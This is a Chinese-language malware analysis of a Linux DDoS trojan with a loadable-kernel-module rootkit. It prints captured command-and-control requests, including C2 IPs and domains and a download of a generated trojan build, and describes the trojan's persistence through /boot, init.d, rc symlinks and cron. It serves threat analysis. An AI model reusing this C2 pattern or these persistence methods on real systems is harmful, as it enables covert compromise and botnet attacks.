一款隐藏嵌入式Rookit的DDoS木马分析

request: GET /compiler?iid=CE74BF62ACFE944B2167248DD0674977&username=admin &password=admin&ip=103.25.9.245:8005%7C103.240.141.50:8005%7C 66.102.253.30:8005%7Cndns.dsaj2a1.org:8005%7Cndns.dsaj2a.org:8005%7C ndns.hcxiaoao.com:8005%7Cndns.dsaj2a.com:8005 &ver=3.8.0-19-generic%5C%20SMP%5C%20mod_unload%5C%20modversions%5C%20686%5C%20 &kernel=3.8.0 reply: 1001|CE74BF62ACFE944B2167248DD0674977|header directory is exists!

第三个GET请求则是下载上一个请求之后服务器生成的木马的二进制文件，请求的方式已经非常明显了，看包：

request: GET /upload/module/CE74BF62ACFE944B2167248DD0674977/build.tgz reply: 1001|CE74BF62ACFE944B2167248DD0674977|create ok

而以上的三个步骤仅仅是针对于感染机器的当前系统版本已经包含在远端服务器中的情况。如果当然的操作系统版本信息并没有包含其中，那么脚本文件则会首先定位到内核头文件的/lib/modules/%s/build/目录中（s%代表uname命令返回的特定信息），然后将内核文件打包并上传到C&C服务器上，这里上传是用的mini这个程序。当然，对于一个产业化的木马来说，这种情况是不多见的，一般的发行版本的内核都是已经被提前编译好的，这里所提及的操作系统的内核信息不在C&C服务器中的情况大多是比较特殊的服务器。

该rootkit组件是一个可装载的内核模块（LKM）。在装载之前，需要通过vermagic的值检查。如果绕过检查失败，则该脚本会安装一个木马来替代rootkit组件。

结构和可持续性

主程序的二进制结构如下图所示：

该木马的持续化的方式是通过多种方式进行的。首先，它将自己安装在/boot/目录下，然后命名为一个包含10个字节的字符串。然后脚本将木马以相同的名字在/etc/init.d/ 目录下创建，同时在/etc/rc%u.d/S90%s目录建立五个符号链接，其中u%是1-5，s%是一个随机值。这样保证每次重启系统木马可以随时启动起来。而且，脚本还会对/etc/cron.hourly/cron.sh文件加入以下内容：

• 《守望先锋》遭受DDoS攻击：部分玩家因吐槽被禁赛！
• ddos防火墙参数怎么设置 ddos防火墙参数设置教程
• 是谁所为？全球互联网域名根服务器遭大规模攻击
• 互联网地下产业：你的电脑也可能是“肉鸡”
• 怎么阻止DDoS攻击？